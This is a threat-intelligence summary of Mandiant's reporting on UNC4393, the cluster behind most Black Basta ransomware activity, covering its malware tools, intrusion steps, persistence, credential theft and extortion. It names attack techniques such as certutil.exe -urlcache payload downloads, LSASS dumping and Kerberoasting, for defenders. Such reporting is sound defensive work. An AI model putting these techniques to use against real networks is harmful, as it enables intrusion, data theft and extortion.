UNC4393 Fuels Black Basta's Ransomware Operations

The threat group UNC4393, reported by Mandiant, poses a serious risk due to its proficiency and speed in executing ransomware attacks. Known primarily for deploying BASTA ransomware and relying on Qakbot malware for initial access, the group adapted after Qakbot's infrastructure was disrupted by law enforcement in August 2023. They shifted to Darkgate malware and formed partnerships with other threat clusters, such as UNC2633, UNC2500, and UNC5155, benefitting from initial access brokers (IAB). Mandiant emphasizes the severity of this group, having "responded to over 40 separate UNC4393 intrusions across 20 different industry verticals," demonstrating their extensive reach. The group's operations are distinguished by their rapid execution, "with a median time to ransom of approximately 42 hours."

UNC4393 leverages various malware tools to conduct its attacks. These include BASTA ransomware, SYSTEMBC, KNOTWRAP, KNOTROCK, DAWNCRY, PORTYARD, and COGSCAN. The BASTA ransomware, written in C++, can delete volume shadow copies and uses ChaCha20 or XChaCha20 encryption. SYSTEMBC acts as a tunneler and can retrieve additional payloads, while KNOTWRAP and DAWNCRY serve as memory-only droppers for additional payloads. PORTYARD is used for tunneling, and COGSCAN is employed for network reconnaissance.

UNC4393's methods are characterized by a blend of living-off-the-land techniques and custom malware deployment. Mandiant's observation of UNC4393's intrusion lifecycle typically starts with initial access gained through phishing emails distributing QAKBOT malware. Once inside the network, the group is adept at using living-off-the-land binaries (LOLBins) to maintain stealth and persistence within the compromised network. These tools include BITSADMIN for background file transfers, curl for data retrieval, cmd and PowerShell for command execution, certutil for downloading payloads, and WMI for remote command execution. The use of "certutil.exe -urlcache" is common for downloading payloads. The group conducts internal reconnaissance using tools like BLOODHOUND, ADFIND, and PSNMAP. They rely heavily on SMB, RDP, remote WMI commands, and various remote access software like AnyDesk, Atera, ScreenConnect, Splashtop, and NetSupport for lateral movement and persistence. Other techniques used to fortify persistence include creating scheduled tasks, manipulating user accounts with password resets or modifying group permissions, modifying the registry, and installing new services. Monitoring files dropped in directories C:\ProgramData, C:\Windows, and C:\Users\Public can be crucial for identifying potential malicious activity.

Efforts to evade defenses include process injection, disabling the Windows firewall, and impairing security monitoring tools. Techniques to acquire credentials include Kerberoasting, pass-the-hash, impersonating access tokens, dumping LSASS, and gathering credentials from the registry. UNC4393's ultimate goal is data theft and extortion, leveraging the threat of data leakage to pressure victims into paying ransoms. They frequently use RECLONE to exfiltrate data, often disguising the binaries as legitimate system utilities. Their ransomware deployment has evolved from manual invocation to utilizing the KNOTROCK utility, which creates symbolic links on network shares and executes the ransomware. This evolution demonstrates UNC4393's commitment to refining its tactics to maximize efficiency and impact.

Mandaint's attribution of the Black Basta ransomware operations has narrowed to "two primary clusters: UNC4393 and UNC3973," with UNC4393 accounting for the "majority of BASTA-related activity." Given the group's ties to the Black Basta ransomware operation, some notable details are shared about the ransomware group separating itself from other ransomware-as-a-service (RaaS) operations. The group does not openly recruit affiliates. Instead, Mandiant found that "BASTA operators maintain a private or small, closed-invitation affiliate model," and "they focus on acquiring initial access via partnerships or purchases in underground communities." While the ransomware operation has held a strong record of over 500 entities compromised since its emergence in 2022, their data leak site (DLS) activity in 2024 peaked at over 35 victims in March 2024 and declined to its lowest in July 2024, with over five victims observed.